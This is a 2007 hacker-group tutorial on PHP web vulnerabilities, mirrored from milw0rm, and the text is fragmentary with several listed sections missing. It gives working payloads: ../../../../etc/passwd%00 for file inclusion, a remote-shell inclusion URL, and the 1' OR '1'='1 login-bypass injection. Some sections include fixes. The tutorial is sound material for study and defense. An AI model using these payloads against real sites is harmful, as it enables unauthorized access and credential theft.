Professional Documents
Culture Documents
/===============================================================================
=\
---------------------------------[ PLAYHACK.net ]-------------------------------
--
\===============================================================================
=/
-[ INFOS ]----------------------------------------------------------------------
-
Title: "PHP Undergroud Security"
Author: Omnipresent
E-Mail: omnipresent@email.it - omni@playhack.net
Website: http://omni.playhack.net - http://www.playhack.net
Date: 2007-04-12
--------------------------------------------------------------------------------
-
-[ SUMMARY ]--------------------------------------------------------------------
-
0x00: Let's start..
0x01: Global Variables, look it carefully
[*] Patching
0x02: File Inclusion
[*] Patching
0x03: XSS
0x04: SQL Injection
\_ 0x04a: Login Bypass
\_ 0x04b: 1 Query? No.. 2 one!
[*] Patching
0x05: File Traverse
[*] Patching
0x05: Conclusion
--------------------------------------------------------------------------------
-
-----------------------------------------------------------------------------[/]
The $include_path is not declared before being used so, an attacker can put
tainted data in this variable and include some other files like /etc/passwd..
For example, a user can EASILY view another file by modifying the value of the
include_path in the URL. For example:
http://remote_host/bugged.php?include_path=../../../../etc/passwd%00
The result of this inclusion will be:
<?php
include "/users/../../../../etc/passwd%00.php"
[...]
?>
So a malicious user can see all stored passwords in the server.
- [ NOTE ] -
%00, what's that? Simple, it means a NULL CHAR that "delete" the PHP extension.
If we omit this NULL Byte we will be able to display ONLY .php files because
the extension included is PHP (include "/users/".$include_path.".PHP")
-------------------------------------------------------------------------------
-----[ Remote File Inclusion]
Take a look of the following code:
<?php
[...]
include($_GET['pag']);
[...]
?>
As we can see, $page is not validated before being used so a malicious user coul
d
include or call (as you prefer to say) his script via the browser and gain acces
s
to the machine or view, as before, a file.
Example one: (gain access to the machine)
http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]
Example two: (view files)
http://remote_host/inc.php?pag=/etc/passwd
---[ Patching ]---
The solution? validate the input. One of lots of methods to validate inputs
would be to create a list of acceptable pages as shown below:
[...]
$pag = $_GET['pag'];
$pages = array('index.php', 'alfa.php', 'beta.php', 'gamma.php');
if(in_array($pag, $pages))
{
include($pag);
{
else
{
die("Hacking Attempt!");
}
[...]
-----------------------------------------------------------------------------[/]
---[ 0x03: XSS]
Hey, do you wanna know somethings about XSS?
My partner has done a great work about XSS and it's useless to write the same th
ings
so, take a look of:
[+] "Cross-Site Scripting for Fun and Profit"
http://www.playhack.net/view.php?type=1&id=18
[+] "Applying XSS to Phishing Attacks"
http://www.playhack.net/view.php?type=1&id=20
-----------------------------------------------------------------------------[/]
---[ 0x03: SQL Injection]
With SQL Injection, as the name said, you can inject SQL Code in the query strin
g
of a bugged web application.
Before starting with an elegant :D example we must know some things about SQL:
- (') apex? What's that? In the SQL Statement this is an operator and for us
(Attacker part) this is very important for the exloiting of some vulnerabilities
.
It delimit the strings..
- (#) Comments? Right :D with this '#' (without apex) it means that in the SQL
Statement we are trying to made a comment. Take it in your mind because it very
useful and important!
- (;) It means that we made a new query on the DataBase.. easy
Ok, after a little break on useful operands (for hacking.. right :D) we can made
the first example: Login Bypass - Gain Admin Credential Rights
<?php
// login.php
$nick = $_POST['nick'];
$pass = $_POST['pass'];
$link = mysql_connect('localhost', 'root', 'root') or die('Error: '.
mysql_error());
mysql_select_db("sql_inj", $link);
$query = mysql_query("SELECT * FROM sql_inj WHERE nick ='".$nick."' AND pass ='"
.$pass. "'",
$link);
if (mysql_num_rows($query) == 0) {
echo "<script type=\"text/javascript\">window.location.href='index.html';</scrip
t>";
exit;
}
$logged = 1;
[...]
//EoF
?>
This script is very simple but very useful to learn somethings about SQL Injecti
on.
As we can see the variables $nick and $pass are not properly sanitized before
being used in the SQL query, so we can inject our code.. our SQL code!
Take a look of the query:
"SELECT * FROM sql_inj WHERE nick ='".$nick."' AND pass ='" .$pass. "'"
What happends if we pass two variables tainted like these:
$nick = 1' OR '1' = '1
$pass = 1' OR '1' = '1
The new query will be:
"SELECT * FROM sql_inj WHERE nick ='1 OR '1' = '1' AND pass ='1' OR '1' = '1'"
mmh.. clear? not? ok let me made clarity..
If you know something about truth tables you do not have problems to understand.
.
1 OR 1 = 1 ??
one OR one is equal to one ? Yeees obvious!!!
So, who is the first user in the table 'sql_inj'?
Maybe who installed the Web Application? Yes! The Admin :D
So, we are logged in as the first user and the first user is the Admin so..
we are the Admin ;) Cool right?
We can put also this query string:
$nick = 1' OR '1' = '1' #
$pass = what_we_want_to_put
The new query will be:
"SELECT * FROM sql_inj WHERE nick ='1 OR '1' = '1' # AND pass = what_we_want_to_
put"
As we said before the '#' it means that what it has after it's a comment! The
NEWEST :D query is:
"SELECT * FROM sql_inj WHERE nick ='1 OR '1' = '1'
and... we are again the Admin :D
-----------------------------------------------------------------------------[/]
?>
-----------------------------------------------------------------------------[/]
-----------------------------------------------------------------------------[/]
\======================================[EOF]====================================
=/
# milw0rm.com [2007-04-12]
© Offensive Security 2010